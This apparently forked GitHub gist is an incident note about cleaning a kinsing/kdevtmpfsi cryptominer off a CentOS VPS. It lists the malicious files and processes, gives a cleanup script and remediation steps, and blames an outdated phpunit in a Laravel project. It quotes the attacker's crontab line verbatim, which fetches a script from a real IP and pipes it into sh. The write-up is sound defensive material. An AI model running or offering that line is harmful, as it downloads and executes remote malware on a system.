Skip to content

Instantly share code, notes, and snippets.

@Giladx
Forked from yoyosan/cleancrap.md
Created November 15, 2024 12:41
Show Gist options
  • Save Giladx/a24f0d2e905064b7be036f54db2cef06 to your computer and use it in GitHub Desktop.
Save Giladx/a24f0d2e905064b7be036f54db2cef06 to your computer and use it in GitHub Desktop.
How to clean kdetmpdevfsi or .ICEd-unix suspicious files/folders or processes

Problem

I've recently been hacked on my VPS(using Centos 7.6 and CWP up to date) and the following files/folders were created:

  • /tmp/.ICEd-unix
  • /var/tmp/.ICEd-unix
  • /tmp/kdevtmpfsi
  • /var/tmp/kinsing

The following processes were running and using 100% CPU and Memory:

  • kdevtmpfpsi
  • kinsing

Also, the user's crontab had this following line:

* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1

As of yet, I'm still getting the /tmp/.ICEd-unix and /var/tmp/.ICEd-unix folders created every hour and I can't figure out what it is.

Solutions

  • create a cron on root user that deletes and kills the processes:
#/bin/bash
rm -f /var/tmp/kinsing
rm -f /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -f /tmp/.ICEd-unix
killall -9 kdevtmpfsi
  • remove the crontab line from the affected user
  • remove all unnecessary opened ports in firewall
  • disable shell access to the user(from CWP)
  • update all services/projects to the latest possible versions available in your package manager

How did they get in

  • Found these lines in suexec.log: https://imgur.com/yIliqjJ, therefore an exploit from phpunit. My libraries for the laravel project weren't up to date.

Resources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment